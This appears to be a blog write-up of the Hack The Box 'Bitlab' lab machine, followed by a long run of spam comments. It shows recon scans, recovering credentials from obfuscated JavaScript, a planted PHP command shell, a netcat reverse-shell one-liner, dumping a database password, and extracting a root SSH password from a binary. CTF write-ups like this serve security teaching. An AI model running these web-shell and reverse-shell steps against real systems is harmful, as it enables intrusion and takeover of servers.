Hey Guys.This is Chan and today I am gonna make a write up about bitlab from Hack The Box.
Sorry for being late to upload write up cause I have an exams in my school recently.
So let’s start.
Bit lab is a linux medium machine and I added the ip adress 10.10.10.114 as bitlab.htb to /etc/hosts. so let’s get jump in.
Nmap
root@ch4n:~/Desktop/vpn# nmap -sC -sV bitlab.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 01:10 EST Nmap scan report for bitlab.htb (10.10.10.114) Host is up (0.26s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA) | 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA) |_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519) 80/tcp open http nginx | http-robots.txt: 55 disallowed entries (15 shown) | / /autocomplete/users /search /api /admin /profile | /dashboard /projects/new /groups/new /groups/*/edit /users /help |_/s/ /snippets/new /snippets/*/edit | http-title: Sign in \xC2\xB7 GitLab |_Requested resource was http://bitlab.htb/users/sign_in |_http-trane-info: Problem with XML parsing of /evox/about Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 63.67 seconds
We got http on port 80 and ssh on port 22, robots.txt in nmap scan results.
Web page
Here git lab is running on web server on port 80 and there is a git lab login so we need a credential to login.
So let’s check robots.txt from our initial nmap scan.
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file # # To ban all spiders from the entire site uncomment the next two lines: # User-Agent: * # Disallow: / # Add a 1 second delay between successive requests to the same server, limits resources used by crawler # Only some crawlers respect this setting, e.g. Googlebot does not # Crawl-delay: 1 # Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application User-Agent: * Disallow: /autocomplete/users Disallow: /search Disallow: /api Disallow: /admin Disallow: /profile Disallow: /dashboard Disallow: /projects/new Disallow: /groups/new Disallow: /groups/*/edit Disallow: /users Disallow: /help # Only specifically allow the Sign In page to avoid very ugly search results Allow: /users/sign_in # Global snippets User-Agent: * Disallow: /s/ Disallow: /snippets/new Disallow: /snippets/*/edit Disallow: /snippets/*/raw # Project details User-Agent: * Disallow: /*/*.git Disallow: /*/*/fork/new Disallow: /*/*/repository/archive* Disallow: /*/*/activity Disallow: /*/*/new Disallow: /*/*/edit Disallow: /*/*/raw Disallow: /*/*/blame Disallow: /*/*/commits/*/* Disallow: /*/*/commit/*.patch Disallow: /*/*/commit/*.diff Disallow: /*/*/compare Disallow: /*/*/branches/new Disallow: /*/*/tags/new Disallow: /*/*/network Disallow: /*/*/graphs Disallow: /*/*/milestones/new Disallow: /*/*/milestones/*/edit Disallow: /*/*/issues/new Disallow: /*/*/issues/*/edit Disallow: /*/*/merge_requests/new Disallow: /*/*/merge_requests/*.patch Disallow: /*/*/merge_requests/*.diff Disallow: /*/*/merge_requests/*/edit Disallow: /*/*/merge_requests/*/diffs Disallow: /*/*/project_members/import Disallow: /*/*/labels/new Disallow: /*/*/labels/*/edit Disallow: /*/*/wikis/*/edit Disallow: /*/*/snippets/new Disallow: /*/*/snippets/*/edit Disallow: /*/*/snippets/*/raw Disallow: /*/*/deploy_keys Disallow: /*/*/hooks Disallow: /*/*/services Disallow: /*/*/protected_branches Disallow: /*/*/uploads/ Disallow: /*/-/group_members Disallow: /*/project_members
here we can see lot of disallow directories.
So let’s scan with gobuster.
root@ch4n:~# gobuster dir -u http://10.10.10.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.114 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/01/13 16:08:02 Starting gobuster =============================================================== Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.114/85c08f62-d433-43da-ac48-37890d552cec => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
When we run gobuster, we got some errors.so I check http://10.10.10.114/85c08f62-d433-43da-ac48-37890d552cec this link in web page it redirected to our web page also it was mention that 302 in gobuster.
So when I tried gobuster without 302,gobuster was probably worked.
After running gobuster,we got the list of directories.
root@ch4n:~# gobuster dir -u http://10.10.10.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,307,401,403 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.114 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/01/13 16:10:53 Starting gobuster =============================================================== /search (Status: 200) /help (Status: 301) /profile (Status: 301) /public (Status: 200) /root (Status: 200) /explore (Status: 200) /ci (Status: 301)
There was an interesting link called Gitlab Login:
When I click the link it doesn’t respond so I will check the web page source there is an interesting js code
<DT><A HREF="javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()" ADD_DATE="1554932142">Gitlab Login</A>
</DL><p>
</DL><p>So I modified the code to excute js console
var _0x4b18=['\x76\x61\x6C\x75\x65','\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E','\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64','\x63\x6C\x61\x76\x65','\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64','\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78'];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];So I typed it like this in my terminal
root@ch4n:~# js > var _0x4b18=['\x76\x61\x6C\x75\x65','\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E','\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64','\x63\x6C\x61\x76\x65','\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64','\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78'];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; Thrown: ReferenceError: document is not defined > _0x4b18 [ 'value', 'user_login', 'getElementById', 'clave', 'user_password', '11des0081x' ]
so we got the creds.
User – clave password – 11des0081x
After logging in using this creds,I found two projetcs profile and developer
In here I created a simple cmd shell.
<?php ($_REQUEST['cmd']); ?>
Then I check it with whoami cmd,it worked so let’s grab the reverse shell
I used this reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/ffrom pentest monkey
then got the reverse shell as www-data
root@ch4n:~/HTB/bitlab#nc -lnvp 1234 Connection from 10.10.10.114:40202 Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 15:17:39 up 5 min, 0 users, load average: 0.75, 0.79, 0.42 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@bitlab:/$ sudo -l sudo -l Matching Defaults entries for www-data on bitlab: env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bitlab: (root) NOPASSWD: /usr/bin/git pull www-data@bitlab:/$
But I wasnt not able to perform anything so I need to try with postrge sql.
php -r '$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");$result = pg_query($db_connection, "SELECT * FROM profiles");print_r(pg_fetch_all($result));'Array
(
[0] => Array
(
=> 1
=> clave
=> c3NoLXN0cjBuZy1wQHNz==
)
)
then we got the user and pass fort ssh.. I decoded this base64 string then login to ssh.
root@ch4n:~# echo -n c3NoLXN0cjBuZy1wQHNz==| base64 -d ssh-str0ng-p@ssbase64: invalid input
it said like that so I decided to login to ssh with this pure base64 string then it worked:-) and grab the user.txt
Privilege escalation
clave@bitlab:~$ ls -la total 44 drwxr-xr-x 4 clave clave 4096 Aug 8 14:40 . drwxr-xr-x 3 root root 4096 Feb 28 2019 .. lrwxrwxrwx 1 root root 9 Feb 28 2019 .bash_history -> /dev/null -rw-r--r-- 1 clave clave 3771 Feb 28 2019 .bashrc drwx------ 2 clave clave 4096 Aug 8 14:40 .cache drwx------ 3 clave clave 4096 Aug 8 14:40 .gnupg -rw-r--r-- 1 clave clave 807 Feb 28 2019 .profile -r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe -r-------- 1 clave clave 33 Feb 28 2019 user.txt
there is an interesting file called RemoteConnection.exe I downloaded this to my machine And I added to x32 debugger and I set a breeakpoint at acess denied got the ssh root password
“-ssh root@gitlab.htb -pw \“Qf7]8YSV.wDNF*[7d?j&eD4^\”” \”Qf7]8YSV.wDNF*[7d?j&eD4^\””
After logged into to ssh as a root user with this pass,we got root and grab the root flag:-)
That’s it guys
Enjoy my write up:-)
Author
CH4N
January 20, 2020 at 2:20 pm
I’ve been browsing online more than 2 hours today, yet I never found any interesting article like yours.
It’s pretty worth enough for me. Personally, if all web owners and bloggers made good content
as you did, the internet will be much more useful than ever before.
These are in fact fantastic ideas in regarding blogging.
You have touched some nice things here. Any way keep up
wrinting. I’ve been surfing online greater than 3 hours these days,
but I by no means found any attention-grabbing article like yours.
It is pretty price sufficient for me. Personally, if all site owners and bloggers made just right content as you probably did,
the net can be much more helpful than ever before.
http://vans.com
January 21, 2020 at 1:27 am
Great info. Lucky me I came across your website by accident
(stumbleupon). I’ve book-marked it for later!
February 7, 2020 at 12:47 am
Great weblog here! Additionally your website lots up very fast!
What web host are you the use of? Can I get your associate link in your host?
I want my website loaded up as fast as yours lol
February 9, 2020 at 2:48 am
I need to to thank you for this wonderful read!! I absolutely enjoyed every
little bit of it. I’ve got you book-marked to
look at new things you post…
February 9, 2020 at 3:02 am
This post will assist the internet users for setting up new webpage or even a
weblog from start to end.
February 26, 2020 at 11:49 am
Neat blog! Is your theme custom made or did you
download it from somewhere? A theme like yours with a few simple tweeks
would really make my blog jump out. Please let me know where you got your theme.
Thanks
March 13, 2020 at 5:20 am
Hey, I think your website might be having browser compatibility
issues. When I look at your blog in Chrome, it looks fine but when opening in Internet Explorer,
it has some overlapping. I just wanted to give you a quick heads up!
Other then that, amazing blog! https://wooricasino114.com
March 20, 2020 at 2:45 pm
It’s really a nice and helpful piece of info.
I’m glad that you just shared this helpful info with
us. Please keep us informed like this. Thank you for sharing.
April 18, 2020 at 1:40 am
I think thhis is one of the most important information for me.
And i am glad rewding your article. But wanna remark on few
general things, The web ssite style is perfect, the arrticles is really great!
April 25, 2020 at 7:13 pm
I am pleased that I detected this web blog, just the right information that
I was searching for!
April 25, 2020 at 7:19 pm
I do not even know howw I ended up here, buut I thought this post was great.
I don’t know whho you aare but certainly you are going to a famous blogger iff you are not already 🙂 Cheers!
April 25, 2020 at 7:29 pm
Hello, I enjoy rading all of your article.
I like to write a little commen to support you.
April 25, 2020 at 7:30 pm
Way cool! Some veery valid points! I appreciate you penning
this post and the rest off the website is also really good.
April 25, 2020 at 7:59 pm
Pretty! This has been an extremely wonderful post.Thank
you for supplyiung thi info.
April 25, 2020 at 8:01 pm
Hello! I wish to say that this post is awesome, great written and come
with approximately all important infos. I’d
like to look extra posts like this! 🙂
April 25, 2020 at 8:25 pm
Hello! I wish to say that this post iss awesome, great writfen and come with approximately all imporrtant infos.
I’d like to look extra posts like this! 🙂
April 25, 2020 at 8:35 pm
I enjoy what you guys are usually up too. This type of
clever work and reporting! Keep up the very good works guys I’ve added you guys to my
own video.
April 26, 2020 at 5:43 pm
Ohh, its fastidious discussion about this article here at this weeb
site, I have read alll that, so now me also commenting at this place.
April 26, 2020 at 5:58 pm
Excellent post. I was checking continuously this blog and I am impressed!
Extrewmely useful information. I care for such information a lot.
I was looking for this certain information for a very long time.Thank
you and good luck.
April 26, 2020 at 9:12 pm
What’s up, after reading this awesome post i am as well
delighted to share my experience here with friends.
April 26, 2020 at 10:29 pm
Thank you for this very good posts. Iwas wanting to
know wheyher you wete planning off publishing similar
posts to this. Keep up writing superb content articles!
April 27, 2020 at 10:35 am
Ohh, iits fastidious discussion about this article here at this web site, I have
rerad all that, so now me also commenting at this place.
May 27, 2020 at 6:57 am
I every time spent my half an hour to read this webpage’s content
all the time along with a cup of coffee.
P.S. If you have a minute, would love your feedback on my new website
re-design. You can find it by searching for «royal cbd» — no sweat if you can’t.
Keep up the good work!
June 4, 2020 at 5:53 pm
I’m very happy to discover this page. I need to to thank you
for ones time just for this fantastic read!
I definitely really liked every little bit of it and I
have you bookmarked to check out new things in your blog.
June 4, 2020 at 6:16 pm
Very good post! We will be linking to this great content onn our website.Keep
up the great writing!
June 4, 2020 at 6:17 pm
It’s not my first time to go to see this web page, i am visiting
this web site very often and take good facts from here.
June 7, 2020 at 12:56 am
It is noot my first time to go to see this website, i aam visiting
this web page dailly and take good information from here all the time.
June 8, 2020 at 8:17 am
Hello all, here every person is sharing such know-how, so it’s pleasant to read this website, and I used to go to see
this website daily.